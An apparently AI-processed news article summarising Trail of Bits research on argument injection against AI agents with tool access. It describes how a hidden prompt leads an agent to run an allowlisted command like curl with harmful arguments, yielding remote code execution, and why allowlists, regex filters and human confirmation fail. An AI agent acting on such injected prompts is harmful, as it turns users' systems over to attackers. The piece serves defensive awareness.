AI-агенты: удобный помощник или открытая дверь для хакеров?
AI-агенты выходят в реальный мир, получают доступ к файлам и консоли. И тут начинается самое интересное. Trail of Bits разобрали, как безобидные на вид функции
AI-processed from Habr AI; edited by Hamidun News
Let's be honest: we all waited for the moment when AI would stop being just a chatty chatbot and start doing things. Booking tickets, debugging code, managing servers. The era of AI agents has arrived, but with it came a headache that many developers have carefully ignored. Trail of Bits dropped an analysis that hits like a cold shower: your "secure" agents are a potential security hole the size of the Grand Canyon.
The core of the problem is right on the surface, but we stubbornly refuse to see it. We give language models access to tools—the file system, the terminal, APIs. To sleep soundly, engineers typically build defenses out of "allowlists" of permitted commands and add a human into the decision-making chain. Like, if the AI wants to do something weird, the human will notice and stop it. Sounds logical? In practice, it crumbles to dust.
Trail of Bits showed how this breaks through argument injection. It's not a classic shell injection, where you just append malicious code. Here everything is more subtle. The hacker manipulates the prompt so that the model uses a permitted utility, but with arguments that turn it into a weapon. Imagine you allowed the agent to use the `curl` command for connectivity checks, and it, under the influence of a hidden prompt, downloads a malicious script and runs it. Formally, the command was on the allowlist. In fact—you just gave the attacker RCE (Remote Code Execution).
It's particularly ironic to put faith in regex filters. Trying to filter LLM output with regular expressions is like trying to hold water in a sieve. Models are too variable, and the context is too complex for rigid regex logic to catch all variants of malicious behavior. This is an architectural anti-pattern that somehow continues to live in the production of many startups.
What about "human in the loop"? This only works in an ideal world. In reality, users suffer from decision fatigue. When the agent asks for confirmation on a harmless action for the tenth time, vigilance dulls. And if the attack is disguised skillfully, even an experienced engineer might not notice the trick in a set of command-line flags. We shift responsibility to the user, who is often the weakest link.
What does this mean for the industry? We're approaching a point where naive AI agent design becomes dangerous. Simply bolting LangChain onto a terminal and hoping for the best is no longer an option. We need complete execution environment isolation (sandboxing), strict privilege restriction at the OS level rather than the application level, and a rejection of the illusion that LLMs can moderate themselves.
The key point: AI agent security cannot be built on trust in the model or user. If your agent has access to the real world, assume it's already compromised. Are you ready for your "smart assistant" to delete the production database?
Want to stop reading about AI and start using it?
AI News is a curated feed of AI/tech news. Hamidun Academy teaches you to use AI systematically in your work.